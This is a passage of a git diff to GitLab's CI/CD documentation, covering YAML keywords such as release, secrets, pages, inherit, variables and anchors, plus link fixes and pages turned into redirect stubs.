run this job when a tag is created manually + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run this job when commits are pushed or merged to the default branch + script: + - echo "EXTRA_DESCRIPTION=some message" >> variables.env # Generate the EXTRA_DESCRIPTION and TAG environment variables + - echo "TAG=v$(cat VERSION)" >> variables.env # and append to the variables.env file + artifacts: + reports: + dotenv: variables.env # Use artifacts:reports:dotenv to expose the variables to other jobs + + release_job: + stage: release + image: registry.gitlab.com/gitlab-org/release-cli:latest + needs: + - job: prepare_job + artifacts: true + rules: + - if: $CI_COMMIT_TAG + when: never # Do not run this job when a tag is created manually + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH # Run this job when commits are pushed or merged to the default branch + script: + - echo 'running release_job for $TAG' + release: + name: 'Release $TAG' + description: 'Created using the release-cli $EXTRA_DESCRIPTION' # $EXTRA_DESCRIPTION and the $TAG + tag_name: '$TAG' # variables must be defined elsewhere + ref: '$CI_COMMIT_SHA' # in the pipeline. For example, in the + milestones: # prepare_job + - 'm1' + - 'm2' + - 'm3' + released_at: '2020-07-15T08:00:00Z' # Optional, is auto generated if not defined, or can use a variable. + assets: + links: + - name: 'asset1' + url: 'https://example.com/assets/1' + - name: 'asset2' + url: 'https://example.com/assets/2' + filepath: '/pretty/url/1' # optional + link_type: 'other' # optional + ``` + +#### Release assets as Generic packages + +You can use [Generic packages](../../user/packages/generic_packages/) to host your release assets. +For a complete example, see the [Release assets as Generic packages](https://gitlab.com/gitlab-org/release-cli/-/tree/master/docs/examples/release-assets-as-generic-package/) +project. + +#### `release-cli` command line + +The entries under the `release` node are transformed into a `bash` command line and sent +to the Docker container, which contains the [release-cli](https://gitlab.com/gitlab-org/release-cli). +You can also call the `release-cli` directly from a `script` entry. + +For example, if you use the YAML described previously: + +```shell +release-cli create --name "Release $CI_COMMIT_SHA" --description "Created using the release-cli $EXTRA_DESCRIPTION" --tag-name "v${MAJOR}.${MINOR}.${REVISION}" --ref "$CI_COMMIT_SHA" --released-at "2020-07-15T08:00:00Z" --milestone "m1" --milestone "m2" --milestone "m3" --assets-link "{\"name\":\"asset1\",\"url\":\"https://example.com/assets/1\",\"link_type\":\"other\"} +``` + +### `secrets` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/33014) in GitLab 13.4. + +Use `secrets` to specify the [CI/CD Secrets](../secrets/index.md) the job needs. It should be a hash, +and the keys should be the names of the variables that are made available to the job. +The value of each secret is saved in a temporary file. This file's path is stored in these +variables. + +#### `secrets:vault` **(PREMIUM)** + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/28321) in GitLab 13.4 and GitLab Runner 13.4. + +Use `vault` to specify secrets provided by [Hashicorp's Vault](https://www.vaultproject.io/). + +This syntax has multiple forms. The shortest form assumes the use of the +[KV-V2](https://www.vaultproject.io/docs/secrets/kv/kv-v2) secrets engine, +mounted at the default path `kv-v2`. The last part of the secret's path is the +field to fetch the value for: + +```yaml +job: + secrets: + DATABASE_PASSWORD: + vault: production/db/password # translates to secret `kv-v2/data/production/db`, field `password` +``` + +You can specify a custom secrets engine path by adding a suffix starting with `@`: + +```yaml +job: + secrets: + DATABASE_PASSWORD: + vault: production/db/password@ops # translates to secret `ops/data/production/db`, field `password` +``` + +In the detailed form of the syntax, you can specify all details explicitly: + +```yaml +job: + secrets: + DATABASE_PASSWORD: # translates to secret `ops/data/production/db`, field `password` + vault: + engine: + name: kv-v2 + path: ops + path: production/db + field: password +``` + +#### `secrets:file` **(PREMIUM)** + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/250695) in GitLab 14.1 and GitLab Runner 14.1. + +By default, the secret is passed to the job context as a variable of type +[`file`](../variables/index.md#cicd-variable-types). The value of the +secret is stored in a file and the variable `DATABASE_PASSWORD` contains a path to the file. + +However, some software does not work with file variables and might require the secret value to be stored +directly in the environment variable. For that case, define a `file` setting: + +```yaml +job: + secrets: + DATABASE_PASSWORD: + vault: production/db/password@ops + file: false +``` + +When you set `file: false`, no files are created for that variable. It contains the secret +itself instead. + +The `file` is a setting of the secret, so it belongs directly under the variable +name level and not in the `vault` section. + +### `pages` + +Use `pages` to upload static content to GitLab. The content +is then published as a website. You must: + +- Place any static content in a `public/` directory. +- Define [`artifacts`](#artifacts) with a path to the `public/` directory. + +The following example moves all files from the root of the project to the +`public/` directory. The `.public` workaround is so `cp` does not also copy +`public/` to itself in an infinite loop: + +```yaml +pages: + stage: deploy + script: + - mkdir .public + - cp -r * .public + - mv .public public + artifacts: + paths: + - public + rules: + - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH +``` + +View the [GitLab Pages user documentation](../../user/project/pages/index.md). + +### `inherit` + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/207484) in GitLab 12.9. + +Use `inherit:` to control inheritance of globally-defined defaults +and variables. + +To enable or disable the inheritance of all `default:` or `variables:` keywords, use: + +- `default: true` or `default: false` +- `variables: true` or `variables: false` + +To inherit only a subset of `default:` keywords or `variables:`, specify what +you wish to inherit. Anything not listed is **not** inherited. Use +one of the following formats: + +```yaml +inherit: + default: [keyword1, keyword2] + variables: [VARIABLE1, VARIABLE2] +``` + +Or: + +```yaml +inherit: + default: + - keyword1 + - keyword2 + variables: + - VARIABLE1 + - VARIABLE2 +``` + +In the following example: + +- `rubocop`: + - inherits: Nothing. +- `rspec`: + - inherits: the default `image` and the `WEBHOOK_URL` variable. + - does **not** inherit: the default `before_script` and the `DOMAIN` variable. +- `capybara`: + - inherits: the default `before_script` and `image`. + - does **not** inherit: the `DOMAIN` and `WEBHOOK_URL` variables. +- `karma`: + - inherits: the default `image` and `before_script`, and the `DOMAIN` variable. + - does **not** inherit: `WEBHOOK_URL` variable. + +```yaml +default: + image: 'ruby:2.4' + before_script: + - echo Hello World + +variables: + DOMAIN: example.com + WEBHOOK_URL: https://my-webhook.example.com + +rubocop: + inherit: + default: false + variables: false + script: bundle exec rubocop + +rspec: + inherit: + default: [image] + variables: [WEBHOOK_URL] + script: bundle exec rspec + +capybara: + inherit: + variables: false + script: bundle exec capybara + +karma: + inherit: + default: true + variables: [DOMAIN] + script: karma +``` + +## `variables` + +> Introduced in GitLab Runner v0.5.0. + +[CI/CD variables](../variables/index.md) are configurable values that are passed to jobs. +They can be set globally and per-job. + +There are two types of variables. + +- [Custom variables](../variables/index.md#custom-cicd-variables): + You can define their values in the `.gitlab-ci.yml` file, in the GitLab UI, + or by using the API. You can also input variables in the GitLab UI when + [running a pipeline manually](../pipelines/index.md#run-a-pipeline-manually). +- [Predefined variables](../variables/predefined_variables.md): + These values are set by the runner itself. + One example is `CI_COMMIT_REF_NAME`, which is the branch or tag the project is built for. + +After you define a variable, you can use it in all executed commands and scripts. + +Variables are meant for non-sensitive project configuration, for example: + +```yaml +variables: + DEPLOY_SITE: "https://example.com/" + +deploy_job: + stage: deploy + script: + - deploy-script --url $DEPLOY_SITE --path "/" + +deploy_review_job: + stage: deploy + variables: + REVIEW_PATH: "/review" + script: + - deploy-review-script --url $DEPLOY_SITE --path $REVIEW_PATH +``` + +You can use only integers and strings for the variable's name and value. + +If you define a variable at the top level of the `gitlab-ci.yml` file, it is global, +meaning it applies to all jobs. If you define a variable in a job, it's available +to that job only. + +If a variable of the same name is defined globally and for a specific job, the +[job-specific variable overrides the global variable](../variables/index.md#cicd-variable-precedence). + +All YAML-defined variables are also set to any linked +[Docker service containers](../services/index.md). + +You can use [YAML anchors for variables](#yaml-anchors-for-variables). + +### Prefill variables in manual pipelines + +> [Introduced in](https://gitlab.com/gitlab-org/gitlab/-/issues/30101) GitLab 13.7. + +Use the `value` and `description` keywords to define [pipeline-level (global) variables that are prefilled](../pipelines/index.md#prefill-variables-in-manual-pipelines) +when [running a pipeline manually](../pipelines/index.md#run-a-pipeline-manually): + +```yaml +variables: + DEPLOY_ENVIRONMENT: + value: "staging" # Deploy to staging by default + description: "The deployment target. Change this variable to 'canary' or 'production' if needed." +``` + +You cannot set job-level variables to be pre-filled when you run a pipeline manually. + +### Configure runner behavior with variables + +You can use [CI/CD variables](../variables/index.md) to configure how the runner processes Git requests: + +- [`GIT_STRATEGY`](../runners/configure_runners.md#git-strategy) +- [`GIT_SUBMODULE_STRATEGY`](../runners/configure_runners.md#git-submodule-strategy) +- [`GIT_CHECKOUT`](../runners/configure_runners.md#git-checkout) +- [`GIT_CLEAN_FLAGS`](../runners/configure_runners.md#git-clean-flags) +- [`GIT_FETCH_EXTRA_FLAGS`](../runners/configure_runners.md#git-fetch-extra-flags) +- [`GIT_DEPTH`](../runners/configure_runners.md#shallow-cloning) (shallow cloning) +- [`GIT_CLONE_PATH`](../runners/configure_runners.md#custom-build-directories) (custom build directories) +- [`TRANSFER_METER_FREQUENCY`](../runners/configure_runners.md#artifact-and-cache-settings) (artifact/cache meter update frequency) +- [`ARTIFACT_COMPRESSION_LEVEL`](../runners/configure_runners.md#artifact-and-cache-settings) (artifact archiver compression level) +- [`CACHE_COMPRESSION_LEVEL`](../runners/configure_runners.md#artifact-and-cache-settings) (cache archiver compression level) + +You can also use variables to configure how many times a runner +[attempts certain stages of job execution](../runners/configure_runners.md#job-stages-attempts). + +## `dast_configuration` **(ULTIMATE)** + +> [Introduced](https://gitlab.com/groups/gitlab-org/-/epics/5981) in GitLab 14.1. + +Use the `dast_configuration` keyword to specify a site profile and scanner profile to be used in a +CI/CD configuration. Both profiles must first have been created in the project. The job's stage must +be `dast`. + +**Keyword type**: Job keyword. You can use only as part of a job. + +**Possible inputs**: One each of `site_profile` and `scanner_profile`. + +- Use `site_profile` to specify the site profile to be used in the job. +- Use `scanner_profile` to specify the scanner profile to be used in the job. + +**Example of `dast_configuration`**: + +```yaml +stages: + - build + - dast + +include: + - template: DAST.gitlab-ci.yml + +dast: + dast_configuration: + site_profile: "Example Co" + scanner_profile: "Quick Passive Test" +``` + +In this example, the `dast` job extends the `dast` configuration added with the `include:` keyword +to select a specific site profile and scanner profile. + +**Additional details**: + +- Settings contained in either a site profile or scanner profile take precedence over those + contained in the DAST template. + +**Related topics**: + +- [Site profile](../../user/application_security/dast/index.md#site-profile). +- [Scanner profile](../../user/application_security/dast/index.md#scanner-profile). + +## YAML-specific features + +In your `.gitlab-ci.yml` file, you can use YAML-specific features like anchors (`&`), aliases (`*`), +and map merging (`<<`). Use these features to reduce the complexity +of the code in the `.gitlab-ci.yml` file. + +Read more about the various [YAML features](https://learnxinyminutes.com/docs/yaml/). + +In most cases, the [`extends` keyword](#extends) is more user friendly and you should +use it when possible. + +You can use YAML anchors to merge YAML arrays. + +### Anchors + +YAML has a feature called 'anchors' that you can use to duplicate +content across your document. + +Use anchors to duplicate or inherit properties. Use anchors with [hidden jobs](#hide-jobs) +to provide templates for your jobs. When there are duplicate keys, GitLab +performs a reverse deep merge based on the keys. + +You can't use YAML anchors across multiple files when using the [`include`](#include) +keyword. Anchors are only valid in the file they were defined in. To reuse configuration +from different YAML files, use [`!reference` tags](#reference-tags) or the +[`extends` keyword](#extends). + +The following example uses anchors and map merging. It creates two jobs, +`test1` and `test2`, that inherit the `.job_template` configuration, each +with their own custom `script` defined: + +```yaml +.job_template: &job_configuration # Hidden yaml configuration that defines an anchor named 'job_configuration' + image: ruby:2.6 + services: + - postgres + - redis + +test1: + <<: *job_configuration # Merge the contents of the 'job_configuration' alias + script: + - test1 project + +test2: + <<: *job_configuration # Merge the contents of the 'job_configuration' alias + script: + - test2 project +``` + +`&` sets up the name of the anchor (`job_configuration`), `<<` means "merge the +given hash into the current one," and `*` includes the named anchor +(`job_configuration` again). The expanded version of this example is: + +```yaml +.job_template: + image: ruby:2.6 + services: + - postgres + - redis + +test1: + image: ruby:2.6 + services: + - postgres + - redis + script: + - test1 project + +test2: + image: ruby:2.6 + services: + - postgres + - redis + script: + - test2 project +``` + +You can use anchors to define two sets of services. For example, `test:postgres` +and `test:mysql` share the `script` defined in `.job_template`, but use different +`services`, defined in `.postgres_services` and `.mysql_services`: + +```yaml +.job_template: &job_configuration + script: + - test project + tags: + - dev + +.postgres_services: + services: &postgres_configuration + - postgres + - ruby + +.mysql_services: + services: &mysql_configuration + - mysql + - ruby + +test:postgres: + <<: *job_configuration + services: *postgres_configuration + tags: + - postgres + +test:mysql: + <<: *job_configuration + services: *mysql_configuration +``` + +The expanded version is: + +```yaml +.job_template: + script: + - test project + tags: + - dev + +.postgres_services: + services: + - postgres + - ruby + +.mysql_services: + services: + - mysql + - ruby + +test:postgres: + script: + - test project + services: + - postgres + - ruby + tags: + - postgres + +test:mysql: + script: + - test project + services: + - mysql + - ruby + tags: + - dev +``` + +You can see that the hidden jobs are conveniently used as templates, and +`tags: [postgres]` overwrites `tags: [dev]`. + +#### YAML anchors for scripts + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/23005) in GitLab 12.5. + +You can use [YAML anchors](#anchors) with [script](#script), [`before_script`](#before_script), +and [`after_script`](#after_script) to use predefined commands in multiple jobs: + +```yaml +.some-script-before: &some-script-before + - echo "Execute this script first" + +.some-script: &some-script + - echo "Execute this script second" + - echo "Execute this script too" + +.some-script-after: &some-script-after + - echo "Execute this script last" + +job1: + before_script: + - *some-script-before + script: + - *some-script + - echo "Execute something, for this job only" + after_script: + - *some-script-after + +job2: + script: + - *some-script-before + - *some-script + - echo "Execute something else, for this job only" + - *some-script-after +``` + +#### YAML anchors for variables + +Use [YAML anchors](#anchors) with `variables` to repeat assignment +of variables across multiple jobs. You can also use YAML anchors when a job +requires a specific `variables` block that would otherwise override the global variables. + +The following example shows how override the `GIT_STRATEGY` variable without affecting +the use of the `SAMPLE_VARIABLE` variable: + +```yaml +# global variables +variables: &global-variables + SAMPLE_VARIABLE: sample_variable_value + ANOTHER_SAMPLE_VARIABLE: another_sample_variable_value + +# a job that must set the GIT_STRATEGY variable, yet depend on global variables +job_no_git_strategy: + stage: cleanup + variables: + <<: *global-variables + GIT_STRATEGY: none + script: echo $SAMPLE_VARIABLE +``` + +### Hide jobs + +If you want to temporarily disable a job, rather than commenting out all the +lines where the job is defined: + +```yaml +# hidden_job: +# script: +# - run test +``` + +Instead, you can start its name with a dot (`.`) and it is not processed by +GitLab CI/CD. In the following example, `.hidden_job` is ignored: + +```yaml +.hidden_job: + script: + - run test +``` + +Use this feature to ignore jobs, or use the +[YAML-specific features](#yaml-specific-features) and transform the hidden jobs +into templates. + +### `!reference` tags + +> - [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/266173) in GitLab 13.9. + +Use the `!reference` custom YAML tag to select keyword configuration from other job +sections and reuse it in the current section. Unlike [YAML anchors](#anchors), you can +use `!reference` tags to reuse configuration from [included](#include) configuration +files as well. + +In the following example, a `script` and an `after_script` from two different locations are +reused in the `test` job: + +- `setup.yml`: + + ```yaml + .setup: + script: + - echo creating environment + ``` + +- `.gitlab-ci.yml`: + + ```yaml + include: + - local: setup.yml + + .teardown: + after_script: + - echo deleting environment + + test: + script: + - !reference [.setup, script] + - echo running my own command + after_script: + - !reference [.teardown, after_script] + ``` + +In the following example, `test-vars-1` reuses all the variables in `.vars`, while `test-vars-2` +selects a specific variable and reuses it as a new `MY_VAR` variable. + +```yaml +.vars: + variables: + URL: "http://my-url.internal" + IMPORTANT_VAR: "the details" + +test-vars-1: + variables: !reference [.vars, variables] + script: + - printenv + +test-vars-2: + variables: + MY_VAR: !reference [.vars, variables, IMPORTANT_VAR] + script: + - printenv +``` + +You can't reuse a section that already includes a `!reference` tag. Only one level +of nesting is supported. + +## Skip Pipeline + +To push a commit without triggering a pipeline, add `[ci skip]` or `[skip ci]`, using any +capitalization, to your commit message. + +Alternatively, if you are using Git 2.10 or later, use the `ci.skip` [Git push option](../../user/project/push_options.md#push-options-for-gitlab-cicd). +The `ci.skip` push option does not skip merge request +pipelines. + +## Processing Git pushes + +GitLab creates at most four branch and tag pipelines when +pushing multiple changes in a single `git push` invocation. + +This limitation does not affect any of the updated merge request pipelines. +All updated merge requests have a pipeline created when using +[pipelines for merge requests](../pipelines/merge_request_pipelines.md). + +## Deprecated keywords + +The following keywords are deprecated. + +### Globally-defined `types` + +WARNING: +`types` is deprecated, and could be removed in a future release. +Use [`stages`](#stages) instead. + +### Job-defined `type` + +WARNING: +`type` is deprecated, and could be removed in one of the future releases. +Use [`stage`](#stage) instead. + +### Globally-defined `image`, `services`, `cache`, `before_script`, `after_script` + +Defining `image`, `services`, `cache`, `before_script`, and +`after_script` globally is deprecated. Support could be removed +from a future release. + +Use [`default:`](#custom-default-keyword-values) instead. For example: + +```yaml +default: + image: ruby:3.0 + services: + - docker:dind + cache: + paths: [vendor/] + before_script: + - bundle config set path vendor/bundle + - bundle install + after_script: + - rm -rf tmp/ +``` + +<!-- ## Troubleshooting + +Include any troubleshooting steps that you can foresee. If you know beforehand what issues +one might have when setting this up, or when something is changed, or on upgrading, it's +important to describe those, too. Think of things that may go wrong and include them here. +This is important to minimize requests for support, and to avoid doc comments with +questions that you know someone might ask. + +Each scenario can be a third-level heading, e.g. `### Getting error message X`. +If you have none to add when creating a doc, leave this section in place +but commented out to help encourage others to add to it in the future. --> diff --git a/doc/ci/yaml/script.md b/doc/ci/yaml/script.md index 2e5517f6190..9e118895d7c 100644 --- a/doc/ci/yaml/script.md +++ b/doc/ci/yaml/script.md @@ -5,9 +5,9 @@ info: To determine the technical writer assigned to the Stage/Group associated w type: reference --- -# GitLab CI/CD script syntax +# GitLab CI/CD script syntax **(FREE)** -You can use special syntax in [`script`](README.md#script) sections to: +You can use special syntax in [`script`](index.md#script) sections to: - [Split long commands](#split-long-commands) into multiline commands. - [Use color codes](#add-color-codes-to-script-output) to make job logs easier to review. @@ -121,7 +121,7 @@ job: - echo -e "\e[31mThis text is red,\e[0m but this text isn't\e[31m however this text is red again." ``` -You can define the color codes in Shell environment variables, or even [custom CI/CD variables](../variables/README.md#custom-cicd-variables), +You can define the color codes in Shell environment variables, or even [custom CI/CD variables](../variables/index.md#custom-cicd-variables), which makes the commands easier to read and reusable. For example, using the same example as above and environment variables defined in a `before_script`: diff --git a/doc/development/README.md b/doc/development/README.md index bc996fdff21..5ab8653dc35 100644 --- a/doc/development/README.md +++ b/doc/development/README.md @@ -1,308 +1,8 @@ --- -comments: false -type: index, dev -stage: none -group: Development -info: "See the Technical Writers assigned to Development Guidelines: https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines" -description: "Development Guidelines: learn how to contribute to GitLab." +redirect_to: 'index.md' --- -# Contributor and Development Docs +This document was moved to [another location](index.md). -Learn the processes and technical information needed for contributing to GitLab. - -This content is intended for members of the GitLab Team as well as community -contributors. Content specific to the GitLab Team should instead be included in -the [Handbook](https://about.gitlab.com/handbook/). - -For information on using GitLab to work on your own software projects, see the -[GitLab user documentation](../user/index.md). - -For information on working with the GitLab APIs, see the [API documentation](../api/README.md). - -For information about how to install, configure, update, and upgrade your own -GitLab instance, see the [administration documentation](../administration/index.md). - -## Get started - -- Set up the GitLab development environment with the - [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/README.md) -- [GitLab contributing guide](contributing/index.md) - - [Issues workflow](contributing/issue_workflow.md) for more information about: - - Issue tracker guidelines. - - Triaging. - - Labels. - - Feature proposals. - - Issue weight. - - Regression issues. - - Technical or UX debt. - - [Merge requests workflow](contributing/merge_request_workflow.md) for more - information about: - - Merge request guidelines. - - Contribution acceptance criteria. - - Definition of done. - - Dependencies. - - [Style guides](contributing/style_guides.md) - - [Implement design & UI elements](contributing/design.md) -- [GitLab Architecture Overview](architecture.md) -- [Rake tasks](rake_tasks.md) for development - -## Processes - -**Must-reads:** - -- [Guide on adapting existing and introducing new components](architecture.md#adapting-existing-and-introducing-new-components) -- [Code review guidelines](code_review.md) for reviewing code and having code - reviewed -- [Database review guidelines](database_review.md) for reviewing - database-related changes and complex SQL queries, and having them reviewed -- [Secure coding guidelines](secure_coding_guidelines.md) -- [Pipelines for the GitLab project](pipelines.md) - -Complementary reads: - -- [GitLab core team & GitLab Inc. contribution process](https://gitlab.com/gitlab-org/gitlab/-/blob/master/PROCESS.md) -- [Security process for developers](https://gitlab.com/gitlab-org/release/docs/blob/master/general/security/developer.md#security-releases-critical-non-critical-as-a-developer) -- [Guidelines for implementing Enterprise Edition features](ee_features.md) -- [Danger bot](dangerbot.md) -- [Guidelines for changelogs](changelog.md) -- [Requesting access to ChatOps on GitLab.com](chatops_on_gitlabcom.md#requesting-access) (for GitLab team members) -- [Patch release process for developers](https://gitlab.com/gitlab-org/release/docs/blob/master/general/patch/process.md#process-for-developers) -- [Adding a new service component to GitLab](adding_service_component.md) - -### Development guidelines review - -When you submit a change to the GitLab development guidelines, who -you ask for reviews depends on the level of change. - -#### Wording, style, or link changes - -Not all changes require extensive review. For example, MRs that don't change the -content's meaning or function can be reviewed, approved, and merged by any -maintainer or Technical Writer. These can include: - -- Typo fixes. -- Clarifying links, such as to external programming language documentation. -- Changes to comply with the [Documentation Style Guide](documentation/index.md) - that don't change the intent of the documentation page. - -#### Specific changes - -If the MR proposes changes that are limited to a particular stage, group, or team, -request a review and approval from an experienced GitLab Team Member in that -group. For example, if you're documenting a new internal API used exclusively by -a given group, request an engineering review from one of the group's members. - -After the engineering review is complete, assign the MR to the -[Technical Writer associated with the stage and group](https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments) -in the modified documentation page's metadata. - -If you have questions or need further input, request a review from the -Technical Writer assigned to the [Development Guidelines](https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines). - -#### Broader changes - -Some changes affect more than one group. For example: - -- Changes to [code review guidelines](code_review.md). -- Changes to [commit message guidelines](contributing/merge_request_workflow.md#commit-messages-guidelines). -- Changes to guidelines in [feature flags in development of GitLab](feature_flags/). -- Changes to [feature flags documentation guidelines](documentation/feature_flags.md). - -In these cases, use the following workflow: - -1. Request a peer review from a member of your team. -1. Request a review and approval of an Engineering Manager (EM) - or Staff Engineer who's responsible for the area in question: - - - [Frontend](https://about.gitlab.com/handbook/engineering/frontend/) - - [Backend](https://about.gitlab.com/handbook/engineering/) - - [Database](https://about.gitlab.com/handbook/engineering/development/database/) - - [User Experience (UX)](https://about.gitlab.com/handbook/engineering/ux/) - - [Security](https://about.gitlab.com/handbook/engineering/security/) - - [Quality](https://about.gitlab.com/handbook/engineering/quality/) - - [Engineering Productivity](https://about.gitlab.com/handbook/engineering/quality/engineering-productivity-team/) - - [Infrastructure](https://about.gitlab.com/handbook/engineering/infrastructure/) - - [Technical Writing](https://about.gitlab.com/handbook/engineering/ux/technical-writing/) - - You can skip this step for MRs authored by EMs or Staff Engineers responsible - for their area. - - If there are several affected groups, you may need approvals at the - EM/Staff Engineer level from each affected area. - -1. After completing the reviews, consult with the EM/Staff Engineer - author / approver of the MR. - - If this is a significant change across multiple areas, request final review - and approval from the VP of Development, the DRI for Development Guidelines, - @clefelhocz1. - -1. After all approvals are complete, assign the merge request to the - Technical Writer for [Development Guidelines](https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines) - for final content review and merge. The Technical Writer may ask for - additional approvals as previously suggested before merging the MR. - -## UX and Frontend guides - -- [GitLab Design System](https://design.gitlab.com/), for building GitLab with - existing CSS styles and elements -- [Frontend guidelines](fe_guide/index.md) -- [Emoji guide](fe_guide/emojis.md) - -## Backend guides - -- [Directory structure](directory_structure.md) -- [GitLab utilities](utilities.md) -- [Issuable-like Rails models](issuable-like-models.md) -- [Logging](logging.md) -- [API style guide](api_styleguide.md) for contributing to the API -- [GraphQL API style guide](api_graphql_styleguide.md) for contributing to the - [GraphQL API](../api/graphql/index.md) -- [Sidekiq guidelines](sidekiq_style_guide.md) for working with Sidekiq workers -- [Working with Gitaly](gitaly.md) -- [Manage feature flags](feature_flags/index.md) -- [Licensed feature availability](licensed_feature_availability.md) -- [Dealing with email/mailers](emails.md) -- [Shell commands](shell_commands.md) in the GitLab codebase -- [`Gemfile` guidelines](gemfile.md) -- [Pry debugging](pry_debugging.md) -- [Sidekiq debugging](../administration/troubleshooting/sidekiq.md) -- [Accessing session data](session.md) -- [Gotchas](gotchas.md) to avoid -- [Avoid modules with instance variables](module_with_instance_variables.md), if - possible -- [How to dump production data to staging](db_dump.md) -- [Working with the GitHub importer](github_importer.md) -- [Import/Export development documentation](import_export.md) -- [Test Import Project](import_project.md) -- [Group migration](bulk_import.md) -- [Elasticsearch integration docs](elasticsearch.md) -- [Working with Merge Request diffs](diffs.md) -- [Kubernetes integration guidelines](kubernetes.md) -- [Permissions](permissions.md) -- [Guidelines for reusing abstractions](reusing_abstractions.md) -- [DeclarativePolicy framework](policies.md) -- [How Git object deduplication works in GitLab](git_object_deduplication.md) -- [Geo development](geo.md) -- [Routing](routing.md) -- [Repository mirroring](repository_mirroring.md) -- [Git LFS](lfs.md) -- [Developing against interacting components or features](interacting_components.md) -- [File uploads](uploads.md) -- [Auto DevOps development guide](auto_devops.md) -- [Mass Inserting Models](mass_insert.md) -- [Value Stream Analytics development guide](value_stream_analytics.md) -- [Issue types vs first-class types](issue_types.md) -- [Application limits](application_limits.md) -- [Redis guidelines](redis.md) -- [Rails initializers](rails_initializers.md) -- [Code comments](code_comments.md) -- [Renaming features](renaming_features.md) -- [Windows Development on GCP](windows.md) -- [Code Intelligence](code_intelligence/index.md) -- [Approval Rules](approval_rules.md) -- [Feature categorization](feature_categorization/index.md) -- [Wikis development guide](wikis.md) -- [Newlines style guide](newlines_styleguide.md) -- [Image scaling guide](image_scaling.md) -- [Export to CSV](export_csv.md) -- [Cascading Settings](cascading_settings.md) -- [FIPS compliance](fips_compliance.md) - -## Performance guides - -- [Instrumentation](instrumentation.md) for Ruby code running in production - environments. -- [Performance guidelines](performance.md) for writing code, benchmarks, and - certain patterns to avoid. -- [Merge request performance guidelines](merge_request_performance_guidelines.md) - for ensuring merge requests do not negatively impact GitLab performance -- [Profiling](profiling.md) a URL, measuring performance using Sherlock, or - tracking down N+1 queries using Bullet. -- [Cached queries guidelines](cached_queries.md), for tracking down N+1 queries - masked by query caching, memory profiling and why should we avoid cached - queries. - -## Database guides - -See [database guidelines](database/index.md). - -## Integration guides - -- [Jira Connect app](integrations/jira_connect.md) -- [Security Scanners](integrations/secure.md) -- [Secure Partner Integration](integrations/secure_partner_integration.md) -- [How to run Jenkins in development environment](integrations/jenkins.md) -- [How to run local `Codesandbox` integration for Web IDE Live Preview](integrations/codesandbox.md) - -## Testing guides - -- [Testing standards and style guidelines](testing_guide/index.md) -- [Frontend testing standards and style guidelines](testing_guide/frontend_testing.md) - -## Refactoring guides - -- [Refactoring guidelines](refactoring_guide/index.md) - -## Deprecation guides - -- [Deprecation guidelines](deprecation_guidelines/index.md) - -## Documentation guides - -- [Writing documentation](documentation/index.md) -- [Documentation style guide](documentation/styleguide/index.md) -- [Markdown](../user/markdown.md) - -## Internationalization (i18n) guides - -- [Introduction](i18n/index.md) -- [Externalization](i18n/externalization.md) -- [Translation](i18n/translation.md) - -## Product Intelligence guides - -- [Product Intelligence guide](https://about.gitlab.com/handbook/product/product-intelligence-guide/) -- [Usage Ping guide](usage_ping/index.md) -- [Snowplow guide](snowplow/index.md) - -## Experiment guide - -- [Introduction](experiment_guide/index.md) - -## Build guides - -- [Building a package for testing purposes](build_test_package.md) - -## Compliance - -- [Licensing](licensing.md) for ensuring license compliance - -## Go guides - -- [Go Guidelines](go_guide/index.md) - -## Shell Scripting guides - -- [Shell scripting standards and style guidelines](shell_scripting_guide/index.md) - -## Domain-specific guides - -- [CI/CD development documentation](cicd/index.md) -- [AppSec development documentation](appsec/index.md) - -## Other Development guides - -- [Defining relations between files using projections](projections.md) -- [Reference processing](reference_processing.md) -- [Compatibility with multiple versions of the application running at the same time](multi_version_compatibility.md) -- [Features inside `.gitlab/`](features_inside_dot_gitlab.md) -- [Dashboards for stage groups](stage_group_dashboards.md) -- [Preventing transient bugs](transient/prevention-patterns.md) - -## Other GitLab Development Kit (GDK) guides - -- [Run full Auto DevOps cycle in a GDK instance](https://gitlab.com/gitlab-org/gitlab-development-kit/blob/main/doc/howto/auto_devops.md) -- [Using GitLab Runner with the GDK](https://gitlab.com/gitlab-org/gitlab-development-kit/blob/main/doc/howto/runner.md) -- [Using the Web IDE terminal with the GDK](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/doc/howto/web_ide_terminal_gdk_setup.md) +<!-- This redirect file can be deleted after 2021-09-28. --> +<!-- Before deletion, see: https://docs.gitlab.com/ee/development/documentation/#move-or-rename-a-page --> diff --git a/doc/development/agent/gitops.md b/doc/development/agent/gitops.md index f183ba86aa1..3d59f5bd845 100644 --- a/doc/development/agent/gitops.md +++ b/doc/development/agent/gitops.md @@ -1,148 +1,9 @@ --- -stage: Configure -group: Configure -info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#designated-technical-writers +redirect_to: 'https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/gitops.md' +remove_date: '2022-06-24' --- -# GitOps with the Kubernetes Agent **(PREMIUM SELF)** +This file was moved to [another location](https://gitlab.com/gitlab-org/cluster-integration/gitlab-agent/-/blob/master/doc/gitops.md). -The [GitLab Kubernetes Agent](../../user/clusters/agent/index.md) supports the -[pull-based version](https://www.gitops.tech/#pull-based-deployments) of -[GitOps](https://www.gitops.tech/). To be useful, the feature must be able to perform these tasks: - -- Connect one or more Kubernetes clusters to a GitLab project or group. -- Synchronize cluster-wide state from a Git repository. -- Synchronize namespace-scoped state from a Git repository. -- Control the following settings: - - - The kinds of objects an agent can manage. - - Enabling the namespaced mode of operation for managing objects only in a specific namespace. - - Enabling the non-namespaced mode of operation for managing objects in any namespace, and - managing non-namespaced objects. - 